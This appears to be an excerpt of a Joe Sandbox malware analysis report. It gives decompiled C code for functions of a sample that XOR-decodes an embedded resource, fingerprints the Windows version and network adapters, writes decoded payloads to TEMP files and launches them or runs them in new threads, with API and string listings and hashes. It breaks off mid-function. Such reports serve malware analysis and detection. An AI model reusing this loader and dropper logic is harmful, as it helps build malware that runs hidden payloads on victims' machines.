0x024e8a47
0x024e8a4e
0x024e8a4e
0x024e8a5a
0x024e8a5a
0x00000000
0x024e8a02

APIs

CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E89BF
GetLastError.KERNEL32 ref: 024E89C9
CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E89F8
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8A1F
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024E8A41
CryptDestroyKey.ADVAPI32(00000000), ref: 024E8A4E
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8A5A

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E89B0
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E89E8

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 3736710109-947817771
Opcode ID: 8c66ecd4a1ae35ececf10beeaa970dab4811945d35051ec2afa20a57e28f0206
Instruction ID: 9d8a74d268e1f6bea4c493ec72515e3926a8844a0a1d874722393d99c1fc8a60
Opcode Fuzzy Hash: 8c66ecd4a1ae35ececf10beeaa970dab4811945d35051ec2afa20a57e28f0206
Instruction Fuzzy Hash: 25312F71A40309EFEF14CFA4C889BAF77B4BB44705F10895AF502AA280C7B49690CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00401EBB Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 107
librarymemorynativeCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00401EBB(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				void* _v16;
				char _v28;
				signed int _v32;
				char* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v408;
				intOrPtr _v412;
				char _v416;
				char _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v476;
				char _v480;
				char* _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				char* _v512;
				char* _v516;
				intOrPtr _v520;
				char _v524;
				char* _v528;
				signed int _v532;
				char* _v536;
				intOrPtr* _t60;
				char* _t66;
				intOrPtr _t67;
				signed int _t95;
				signed int _t105;
				void* _t110;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;

				_t94 = __ecx;
				_t111 = _t110 - 0x1ec;
				_v456 = E00418AA0;
				_v452 = 0x419106;
				_t60 =  &_v448;
				 *_t60 =  &_v28;
				 *((intOrPtr*)(_t60 + 4)) = E00402044;
				 *((intOrPtr*)(_t60 + 8)) = _t111;
				 *_t111 =  &_v480;
				E0040E1A0(__ecx, E00402044);
				_v52 = 0;
				_v36 = "s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ";
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				_v64 = 0;
				_v416 = L"OMT";
				_v412 = _a4;
				_v408 = 0x409;
				_v496 =  &_v56;
				_v500 = 3;
				_t66 =  &_v416;
				_v504 = _t66;
				 *_t111 = 0x400000;
				_v476 = 1;
				L00404F64();
				_v48 = _t66;
				_t67 = _v56;
				_v512 =  &_v64;
				_v516 =  &_v60;
				_v520 = _t67;
				_v524 = 0x400000;
				L00404F6C();
				_t113 = _t111;
				_v48 = _t67;
				_v520 = 0x40;
				_v524 = 0x3000;
				_v528 =  &_v64;
				_v532 = 0;
				_v536 =  &_v52;
				 *_t113 = 0xffffffff; // executed
				NtAllocateVirtualMemory(??, ??, ??, ??, ??, ??); // executed
				_t114 = _t113 - 0x18;
				_v32 = 0;
				while(_v32 < _v64) {
					_t95 = _v32;
					_t105 = ((_t95 * 0xdd67c8a7 >> 0x20) + _t95 >> 5) - (_t95 >> 0x1f);
					_t94 = _t95 - ((_t105 << 3) + _t105 << 2) + _t105;
					 *((char*)(_v52 + _v32)) = _v36[_t95 - ((_t105 << 3) + _t105 << 2) + _t105] & 0x000000ff ^  *(_v32 + _v60) & 0x000000ff;
					_v32 = _v32 + 1;
				}
				_t107 = _v52;
				 *_a8 = _v52;
				 *_t114 =  &_v480;
				return E0040E320(_t94, _t107);
			}

APIs

LdrFindResource_U.NTDLL ref: 00401F71
LdrAccessResource.NTDLL ref: 00401F98
NtAllocateVirtualMemory.NTDLL ref: 00401FD0

Strings

s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ, xrefs: 00401F06
@, xrefs: 00401FA3
OMT, xrefs: 00401F29

Memory Dump Source

Source File: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: AccessAllocateFindMemoryResourceResource_Virtual
String ID: @$OMT$s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ
API String ID: 2485490239-3843035961
Opcode ID: 3ba9d8c3c3de79a090e3b742c6c1ed1d57ad730d95a193a03d7c314015c75e69
Instruction ID: ff8897463fb2fbedf42f4e80d1da6419d3676337a3971e8b30f16ddae3d354f8
Opcode Fuzzy Hash: 3ba9d8c3c3de79a090e3b742c6c1ed1d57ad730d95a193a03d7c314015c75e69
Instruction Fuzzy Hash: EE4106B09042199FCB00DF69C884BDEFBF4EB89304F10C56AE958A7341D7789A49CF95

Uniqueness

Uniqueness Score: -1.00%

Function 024E9F70 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E024E9F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* _v32;
				intOrPtr* _t59;
				intOrPtr _t64;
				void* _t99;
				void* _t100;

				_v8 = 1;
				if(_a4 != 0) {
					_t103 = _a8 - 5;
					if(_a8 > 5) {
						asm("cdq");
						_t59 = E024E97A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288);
						_t100 = _t99 + 4;
						_v28 = _t59;
						_v12 = _v28;
						if(_v12 != 0) {
							_v16 = _v12;
							_v20 = _a8 * 0x288 / 6;
							_push( &_v20);
							_t64 = _v12;
							_push(_t64); // executed
							L024EB1DA(); // executed
							if(_t64 == 0) {
								_v24 = 0;
								while(_v12 != 0 && _v24 < _a8) {
									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
										E024E7B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
										_t100 = _t100 + 0xc;
										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
										_v12 =  *_v12;
										_v8 = 1;
										continue;
									}
									break;
								}
								 *_a12 = _v24;
							}
							_v32 = _v16;
							E024E97C0(_v32); // executed
						}
					}
				}
				return _v8;
			}

0x024e9f76
0x024e9f81
0x024e9f87
0x024e9f8b
0x024e9f94
0x024e9fad
0x024e9fb2
0x024e9fb5
0x024e9fbb
0x024e9fc2
0x024e9fcb
0x024e9fe0
0x024e9fe6
0x024e9fe7
0x024e9fea
0x024e9feb
0x024e9ff2
0x024e9ff4
0x024e9ffb
0x024ea018
0x024ea034
0x024ea039
0x024ea048
0x024ea050
0x024ea053
0x00000000
0x024ea05e
0x00000000
0x024ea018
0x024ea066
0x024ea066
0x024ea06b
0x024ea072
0x024ea077
0x024e9fc2
0x024e9f8b
0x024ea080

APIs

Part of subcall function 024E97A0: GetProcessHeap.KERNEL32(00000008,024E9FB2,?,024E9FB2,00000000,?,?,?,024E9E2D), ref: 024E97A9
Part of subcall function 024E97A0: HeapAlloc.KERNEL32(00000000,?,024E9FB2,00000000,?,?,?,024E9E2D), ref: 024E97B0

GetAdaptersInfo.IPHLPAPI(00000000,024E9E2D), ref: 024E9FEB

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Heap$AdaptersAllocInfoProcess
String ID:
API String ID: 1618573189-0
Opcode ID: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
Instruction ID: 2f088f3b2aed809a6a384e7926dd01ef5fadce8ecbcfcd7136c408cac7ce4d8a
Opcode Fuzzy Hash: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
Instruction Fuzzy Hash: BC310C74D00209DFDF04CF98C495BAEB7B5EF48309F14816AE50AA7350D7359A45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 024E8F80 Relevance: 63.2, APIs: 22, Strings: 14, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E024E8F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
				int _v8;
				struct _SYSTEM_INFO _v44;
				signed int _v50;
				signed short _v52;
				struct _OSVERSIONINFOA _v204;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
					L45:
					return _v8;
				} else {
					E024E7D20(E024E7D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
					_v204.dwOSVersionInfoSize = 0x9c;
					E024E7D20( &_v44,  &_v44, 0, 0x24);
					if(GetVersionExA( &_v204) == 0) {
						L43:
						if(_v8 == 0) {
							lstrcatA(_a4, "UndefinedOS");
						}
						goto L45;
					}
					GetSystemInfo( &_v44); // executed
					if(_v204.dwMajorVersion != 5) {
						if(_v204.dwMajorVersion == 6) {
							if(_v204.dwMinorVersion != 0) {
								if(_v204.dwMinorVersion != 1) {
									if(_v204.dwMinorVersion == 2) {
										if((_v50 & 0x000000ff) == 1) {
											if((_v50 & 0x000000ff) == 1) {
												lstrcatA(_a4, "Win8");
												 *_a12 = 0xb;
											}
										} else {
											lstrcatA(_a4, "WinServer2012");
											 *_a12 = 0xc;
										}
									}
								} else {
									if((_v50 & 0x000000ff) == 1) {
										if((_v50 & 0x000000ff) == 1) {
											lstrcatA(_a4, "Win7");
											 *_a12 = 8;
										}
									} else {
										lstrcatA(_a4, "WinServer2008R2");
										 *_a12 = 0xa;
									}
								}
							} else {
								if((_v50 & 0x000000ff) != 1) {
									if((_v50 & 0x000000ff) != 1) {
										lstrcatA(_a4, "WinServer2008");
										 *_a12 = 9;
									}
								} else {
									lstrcatA(_a4, "Vista");
									 *_a12 = 7;
								}
							}
						}
						L38:
						if(E024E9290() != 0) {
							lstrcatA(_a4, "_x64");
						}
						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
							lstrcatA(_a4, "_");
							lstrcatA(_a4,  &(_v204.szCSDVersion));
						}
						_v8 = lstrlenA(_a4);
						goto L43;
					}
					if(_v204.dwMinorVersion != 0) {
						if(_v204.dwMinorVersion != 1) {
							if(_v204.dwMinorVersion == 2) {
								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
									if(GetSystemMetrics(0x59) != 0) {
										if(GetSystemMetrics(0x59) == 0) {
											if((_v52 & 0x8000) != 0) {
												lstrcatA(_a4, "WinHomeServer");
												 *_a12 = 4;
											}
										} else {
											lstrcatA(_a4, "WinServer2003R2");
											 *_a12 = 6;
										}
									} else {
										lstrcatA(_a4, "WinServer2003");
										 *_a12 = 5;
									}
								} else {
									lstrcatA(_a4, "WinXP64");
									 *_a12 = 3;
								}
							}
						} else {
							lstrcatA(_a4, "WinXP");
							 *_a12 = 2;
						}
					} else {
						lstrcatA(_a4, "Win2K");
						 *_a12 = 1;
					}
					goto L38;
				}
			}

0x024e8f89
0x024e8f94
0x024e927b
0x024e9281
0x024e8fae
0x024e8fce
0x024e8fd6
0x024e8fe8
0x024e8fff
0x024e9266
0x024e926a
0x024e9275
0x024e9275
0x00000000
0x024e926a
0x024e9009
0x024e9016
0x024e911c
0x024e9129
0x024e917b
0x024e91ca
0x024e91d3
0x024e91f6
0x024e9201
0x024e920a
0x024e920a
0x024e91d5
0x024e91de
0x024e91e7
0x024e91e7
0x024e91d3
0x024e917d
0x024e9184
0x024e91a7
0x024e91b2
0x024e91bb
0x024e91bb
0x024e9186
0x024e918f
0x024e9198
0x024e9198
0x024e91c1
0x024e912b
0x024e9132
0x024e9155
0x024e9160
0x024e9169
0x024e9169
0x024e9134
0x024e913d
0x024e9146
0x024e9146
0x024e916f
0x024e9129
0x024e9210
0x024e9217
0x024e9222
0x024e9222
0x024e9237
0x024e9242
0x024e9253
0x024e9253
0x024e9263
0x00000000
0x024e9263
0x024e9023
0x024e9049
0x024e906f
0x024e907c
0x024e90ab
0x024e90d1
0x024e90f6
0x024e9101
0x024e910a
0x024e910a
0x024e90d3
0x024e90dc
0x024e90e5
0x024e90e5
0x024e90ad
0x024e90b6
0x024e90bf
0x024e90bf
0x024e9087
0x024e9090
0x024e9099
0x024e9099
0x024e907c
0x024e904b
0x024e9054
0x024e905d
0x024e905d
0x024e9025
0x024e902e
0x024e9037
0x024e9037
0x00000000
0x024e9110

APIs

GetVersionExA.KERNEL32(0000009C), ref: 024E8FF7
GetSystemInfo.KERNEL32(?), ref: 024E9009
lstrcatA.KERNEL32(00000000,Win2K), ref: 024E902E
lstrcatA.KERNEL32(00000000,WinXP), ref: 024E9054
lstrcatA.KERNEL32(00000000,Vista), ref: 024E913D
lstrcatA.KERNEL32(00000000,WinServer2008), ref: 024E9160
lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 024E918F
lstrcatA.KERNEL32(00000000,Win7), ref: 024E91B2
lstrcatA.KERNEL32(00000000,WinServer2012), ref: 024E91DE
lstrcatA.KERNEL32(00000000,Win8), ref: 024E9201
lstrcatA.KERNEL32(00000000,_x64), ref: 024E9222
lstrlenA.KERNEL32(?), ref: 024E922F
lstrcatA.KERNEL32(00000000,024EC980), ref: 024E9242
lstrcatA.KERNEL32(00000000,?), ref: 024E9253
lstrlenA.KERNEL32(00000000), ref: 024E925D
lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 024E9275

Strings

Win2K, xrefs: 024E9025
WinXP, xrefs: 024E904B
WinServer2012, xrefs: 024E91D5
WinServer2008, xrefs: 024E9157
WinServer2003R2, xrefs: 024E90D3
Win7, xrefs: 024E91A9
WinXP64, xrefs: 024E9087
_x64, xrefs: 024E9219
Vista, xrefs: 024E9134
WinServer2008R2, xrefs: 024E9186
UndefinedOS, xrefs: 024E926C
WinHomeServer, xrefs: 024E90F8
Win8, xrefs: 024E91F8
WinServer2003, xrefs: 024E90AD

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: lstrcat$lstrlen$InfoSystemVersion
String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
API String ID: 3139318632-332591429
Opcode ID: 88a0a6816ed8cb88ac761b3867e5340b86fddbb169b6b0d0760306c084cb7f70
Instruction ID: 3f768916e918dacf7d07f599f2eaeb56ab3a8d006b67b4ee5300658fcfefca7c
Opcode Fuzzy Hash: 88a0a6816ed8cb88ac761b3867e5340b86fddbb169b6b0d0760306c084cb7f70
Instruction Fuzzy Hash: EC812CB4A40349EBFF259FA0C889BAE7B75BB05302F108947F917AA281D775D590CF60

Uniqueness

Uniqueness Score: -1.00%

Function 024E62B0 Relevance: 56.7, APIs: 29, Strings: 3, Instructions: 657
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E024E62B0(intOrPtr* _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v12;
				signed int _v13;
				void* _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v36;
				void* _v40;
				long _v44;
				signed int _v48;
				void* _v52;
				long _v56;
				void _v60;
				char _v324;
				void* _v328;
				char _v340;
				char _v604;
				int _v608;
				long _v612;
				signed int _v616;
				void* _v620;
				void* _v624;
				void* _v628;
				int _v632;
				signed int _v636;
				long _v640;
				void* _v644;
				void* _v648;
				void* _v652;
				char _v916;
				void* _v920;
				char _v932;
				char _v1196;
				long _v1200;
				int _v1204;
				long _v1208;
				void* _v1212;
				long _v1216;
				signed int _v1220;
				void* _v1224;
				void* _v1228;
				intOrPtr _t317;
				signed char _t321;
				void* _t333;
				signed int _t340;
				void* _t349;
				signed int _t355;
				void* _t361;
				void* _t368;
				void* _t378;
				void* _t381;
				signed int _t383;
				void* _t386;
				void* _t393;
				int _t415;
				signed int _t421;
				signed int _t428;
				signed char _t433;
				void* _t439;
				signed char _t442;
				void* _t448;
				signed int _t452;
				intOrPtr _t455;
				void* _t465;
				void* _t472;
				void* _t473;
				void* _t508;
				void* _t509;
				void* _t528;
				void* _t529;
				void* _t539;
				void* _t549;
				void* _t550;
				void* _t551;
				void* _t563;
				void* _t598;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L99:
					return _v8;
				} else {
					_v12 =  *_a4;
					if(_v12 > 0 && _v12 < 0x400) {
						_v20 = _a4 + 4;
						_v24 = 0;
						while(_v24 < _v12) {
							if(_v24 <= 0) {
								L10:
								_v28 = _v20 + 0x18;
								_v32 =  *_v20 - 0x18;
								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee270; // 0x1
								if(__eflags != 0) {
									L22:
									_t428 = _v24 + 1;
									__eflags = _t428;
									_v24 = _t428;
									continue;
								}
								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x24ee284; // 0x1
								if(__eflags != 0) {
									goto L22;
								}
								_t508 = _v20;
								__eflags =  *(_t508 + 0xc) & 0x00000002;
								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
									goto L22;
								}
								__eflags =  *0x24f435d & 0x000000ff;
								if(( *0x24f435d & 0x000000ff) == 0) {
									goto L22;
								}
								_t509 = _v20;
								__eflags =  *(_t509 + 0xc) & 0x00000010;
								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
									_t433 = E024E1EE0(_v28, 0xea60);
									_t598 = _t598 + 8;
									_v8 = _t433 & 0x000000ff;
									L21:
									break;
								}
								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
								__eflags = _v40;
								if(_v40 == 0) {
									L19:
									goto L21;
								}
								_t439 = E024E6260(_v40, _v28, _v32, _v40, _v44);
								__eflags = _t439 - _v44;
								if(_t439 == _v44) {
									_t442 = E024E1EE0(_v40, 0xea60);
									_t598 = _t598 + 8;
									_v8 = _t442 & 0x000000ff;
								}
								VirtualFree(_v40, 0, 0x8000);
								goto L19;
							} else {
								_v36 =  *_v20;
								_v20 = _v20 + _v36;
								if(_v20 <= _a4 + _a8) {
									goto L10;
								} else {
									return 0;
								}
							}
						}
						_v13 = 0;
						_v20 = _a4 + 4;
						_v48 = 0;
						while(1) {
							__eflags = _v48 - _v12;
							if(_v48 >= _v12) {
								break;
							}
							__eflags = _v48;
							if(_v48 <= 0) {
								L29:
								_v52 = _v20 + 0x18;
								_v56 =  *_v20 - 0x18;
								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee274; // 0x2
								if(__eflags != 0) {
									L39:
									_t448 = _v20;
									__eflags =  *(_t448 + 0xc) & 0x00000002;
									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee270; // 0x1
										if(__eflags != 0) {
											L90:
											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee278; // 0x3
											if(__eflags != 0) {
												L93:
												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x24ee27c; // 0x4
												if(__eflags == 0) {
													_v13 = 1;
												}
												L95:
												L24:
												_t452 = _v48 + 1;
												__eflags = _t452;
												_v48 = _t452;
												continue;
											}
											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x24ee288; // 0x2
											if(__eflags != 0) {
												goto L93;
											}
											_t317 =  *0x24ee28c; // 0x24f3f88
											_t455 =  *0x24f18a0; // 0x24f3b88
											E024EA360(_t455, _t317, _v52, _v56);
											_t598 = _t598 + 0x10;
											goto L95;
										}
										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x24ee284; // 0x1
										if(__eflags != 0) {
											goto L90;
										}
										_t321 = E024E7250(_v20, _v52, _v56);
										_t598 = _t598 + 0xc;
										__eflags = _t321 & 0x000000ff;
										if((_t321 & 0x000000ff) != 0) {
											_t528 = _v20;
											__eflags =  *(_t528 + 0x14);
											if( *(_t528 + 0x14) == 0) {
												L48:
												_t529 = _v20;
												__eflags =  *(_t529 + 0xc) & 0x00000001;
												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
													E024E7D20( &_v932,  &_v932, 0, 0xa);
													E024E9730( &_v932, 4);
													_t598 = _t598 + 0x14;
													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
													__eflags = _v920 - 0xffffffff;
													if(_v920 == 0xffffffff) {
														L89:
														goto L24;
													}
													_v1200 = 0;
													_v1204 = 0;
													_v1208 = _v56;
													_t333 = _v20;
													__eflags =  *(_t333 + 0xc) & 0x00000010;
													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
													} else {
														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
														__eflags = _v1212;
														if(_v1212 != 0) {
															_t349 = E024E6260(_v56, _v52, _v56, _v1212, _v1216);
															__eflags = _t349 - _v1216;
															if(_t349 == _v1216) {
																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
																_v1208 = _v1216;
															}
															VirtualFree(_v1212, 0, 0x8000);
														}
													}
													__eflags = _v1204;
													if(_v1204 == 0) {
														L88:
														CloseHandle(_v920);
													} else {
														__eflags = _v1200 - _v1208;
														if(_v1200 != _v1208) {
															goto L88;
														}
														CloseHandle(_v920);
														_t340 = E024E1E60( &_v916);
														_t598 = _t598 + 4;
														_v1220 = _t340;
														__eflags = _v1220;
														if(_v1220 != 0) {
															_t465 = _v20;
															__eflags =  *(_t465 + 0x10);
															if( *(_t465 + 0x10) != 0) {
																E024E73C0(_v20, _v52, _v56);
																_t598 = _t598 + 0xc;
															}
															_t539 = _v20;
															__eflags =  *(_t539 + 0xc) & 0x00000004;
															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
																E024E2510(_v1220, 0x24ee290);
																_t598 = _t598 + 8;
															}
															_v8 = 1;
														}
													}
													goto L89;
												}
												_v636 = 0;
												_v632 = 0;
												_v640 = 0;
												_t472 = _v20;
												__eflags =  *(_t472 + 0xc) & 0x00000010;
												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
													_t355 = E024E2070(_v52);
													_t598 = _t598 + 4;
													_v636 = _t355;
												} else {
													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
													_v644 = _t378;
													__eflags = _v644;
													if(_v644 != 0) {
														_t381 = E024E6260(_v644, _v52, _v56, _v644, _v640);
														__eflags = _t381 - _v640;
														if(_t381 == _v640) {
															_t383 = E024E2070(_v644); // executed
															_t598 = _t598 + 4;
															_v636 = _t383;
															_t563 = _v20;
															__eflags =  *(_t563 + 0xc) & 0x00000008;
															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
																_v632 = _t386;
																E024E7B70(_v632, _v644, _v640);
																_t598 = _t598 + 0xc;
															}
														}
														VirtualFree(_v644, 0, 0x8000); // executed
													}
												}
												__eflags = _v636;
												if(_v636 != 0) {
													_t473 = _v20;
													__eflags =  *(_t473 + 0x10);
													if( *(_t473 + 0x10) != 0) {
														E024E73C0(_v20, _v52, _v56);
														_t598 = _t598 + 0xc;
													}
													_t549 = _v20;
													__eflags =  *(_t549 + 0xc) & 0x00000008;
													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
														_t361 = E024E97A0(0x10);
														_t598 = _t598 + 4;
														_v1228 = _t361;
														_v648 = _v1228;
														_t551 = _v20;
														__eflags =  *(_t551 + 0xc) & 0x00000010;
														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
															__eflags =  *_v648;
															if( *_v648 != 0) {
																E024E7B70( *_v648, _v52, _v56);
																_t598 = _t598 + 0xc;
																 *(_v648 + 4) = _v56;
															}
														} else {
															 *_v648 = _v632;
															 *(_v648 + 4) = _v640;
														}
														__eflags =  *_v648;
														if( *_v648 != 0) {
															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
															_t368 = CreateThread(0, 0, E024E77B0, _v648, 0, 0); // executed
															_v652 = _t368;
															CloseHandle(_v652);
														}
													}
													_t550 = _v20;
													__eflags =  *(_t550 + 0xc) & 0x00000004;
													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
														E024E2510(_v636, 0x24ee290);
														_t598 = _t598 + 8;
													}
													_v8 = 1;
												}
												goto L24;
											}
											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
											__eflags = _v620;
											if(_v620 == 0) {
												goto L48;
											}
											E024E7B70(_v620, _v52, _v56);
											_t393 = E024E97A0(0x20);
											_t598 = _t598 + 0x10;
											_v1224 = _t393;
											_v624 = _v1224;
											 *_v624 =  *_v20;
											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
											 *(_v624 + 0x18) = _v620;
											_v628 = CreateThread(0, 0, E024E6DA0, _v624, 0, 0);
											CloseHandle(_v628);
											goto L24;
										}
										goto L24;
									}
									goto L24;
								}
								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x24ee284; // 0x1
								if(__eflags != 0) {
									goto L39;
								}
								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
								E024E7D20( &_v340,  &_v340, 0, 0xa);
								E024E9730( &_v340, 4);
								_t598 = _t598 + 0x14;
								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
								__eflags = _v328 - 0xffffffff;
								if(_v328 == 0xffffffff) {
									goto L39;
								}
								_v608 = 0;
								_v612 = 0;
								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
								__eflags = _t415;
								if(_t415 == 0) {
									L37:
									__eflags = _v608;
									if(_v608 == 0) {
										CloseHandle(_v328);
									}
									goto L39;
								}
								__eflags = _v612 - _v56;
								if(_v612 != _v56) {
									goto L37;
								}
								_v608 = CloseHandle(_v328);
								E024E6C60();
